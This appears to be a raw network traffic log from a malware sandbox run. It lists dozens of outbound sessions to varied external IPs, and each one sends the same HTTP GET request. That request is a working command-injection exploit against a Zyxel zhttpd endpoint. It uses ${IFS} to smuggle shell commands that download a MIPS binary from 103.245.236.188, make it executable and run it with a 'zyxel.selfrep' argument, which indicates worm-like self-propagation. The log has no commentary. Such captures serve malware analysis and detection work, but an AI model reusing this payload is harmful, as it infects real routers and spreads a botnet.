                                                Jan 12, 2024 18:24:32.766040087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3591192.168.2.1335000135.123.86.218443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.766082048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3592192.168.2.134227495.155.63.140443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.766127110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3593192.168.2.134347241.139.33.74443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.766177893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3594192.168.2.1341914129.103.37.0443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.766177893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3595192.168.2.136058272.58.179.86443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.766244888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3596192.168.2.134413282.219.239.238443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.766288996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3597192.168.2.1335592196.254.120.196443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.766355038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3598192.168.2.1356858113.157.130.119443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.766388893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3599192.168.2.1337774157.143.72.115443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.766427040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3600192.168.2.135836238.13.231.26443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.766468048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3601192.168.2.1344490173.234.46.42443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.766505003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3602192.168.2.134251225.104.25.241443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.766556025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3603192.168.2.1339836124.139.118.161443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.766601086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3604192.168.2.1354470221.103.173.135443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.766624928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3605192.168.2.134219285.82.41.228443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.766664982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3606192.168.2.1344000208.84.68.56443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.766710043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3607192.168.2.134761850.82.106.239443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.766765118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3608192.168.2.1349254157.180.55.251443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.766808033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3609192.168.2.1348304119.179.106.255443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.766844034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3610192.168.2.134728460.203.24.36443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.766866922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3611192.168.2.1343104211.157.95.168443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.766896009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3612192.168.2.133317224.86.126.64443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.766951084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3613192.168.2.1356740113.211.85.126443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.767004013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3614192.168.2.1341784125.69.108.101443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.767045021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3615192.168.2.1357264164.13.17.168443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.767066956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3616192.168.2.1336502133.22.123.74443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.767128944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3617192.168.2.1357224141.117.251.91443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.767173052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3618192.168.2.134760240.62.226.168443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.767224073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3619192.168.2.1358496217.158.197.148443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.767276049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3620192.168.2.1340376162.55.88.236443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.767311096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3621192.168.2.1339548191.59.104.215443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.767357111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3622192.168.2.1345270134.145.23.61443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.767375946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3623192.168.2.1344128164.167.60.222443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.767425060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3624192.168.2.134578093.70.155.181443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.767482042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3625192.168.2.1343724104.15.206.56443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.767510891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3626192.168.2.1346594182.115.97.104443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.767558098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3627192.168.2.1342426102.1.134.135443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.767596006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3628192.168.2.1358090217.199.39.216443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.767640114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3629192.168.2.1360452189.133.99.127443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.767671108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3630192.168.2.1344448125.7.121.228443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.767719984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3631192.168.2.133970890.171.110.181443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.767750978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3632192.168.2.1346624116.3.6.128443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.767787933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3633192.168.2.133906094.102.83.59443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.767846107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3634192.168.2.135975843.174.135.21443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.767884016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3635192.168.2.134699627.246.78.87443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.767935038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3636192.168.2.1343538193.160.235.76443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.767962933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3637192.168.2.135880853.61.252.237443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.768027067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3638192.168.2.1354030159.169.152.104443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.768065929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3639192.168.2.13411784.97.220.190443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.768121004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3640192.168.2.1359772188.194.102.208443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.768165112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3641192.168.2.134957217.239.57.236443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.768209934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3642192.168.2.133861077.199.219.253443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.768248081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3643192.168.2.134024451.237.42.64443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.768271923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3644192.168.2.1346870193.249.51.12443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.768321991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3645192.168.2.135309872.68.102.114443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.768362999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3646192.168.2.1339410187.44.129.67443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.768409014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3647192.168.2.135294683.78.140.160443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.768455029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3648192.168.2.1346226198.63.136.22443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.768496037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3649192.168.2.135647849.218.121.122443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.768522978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3650192.168.2.135041879.209.3.77443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.768563986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3651192.168.2.135037219.80.201.181443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.768608093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3652192.168.2.134579650.208.97.223443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.768626928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3653192.168.2.1339850169.236.8.74443
                                                TimestampBytes transferredDirectionData
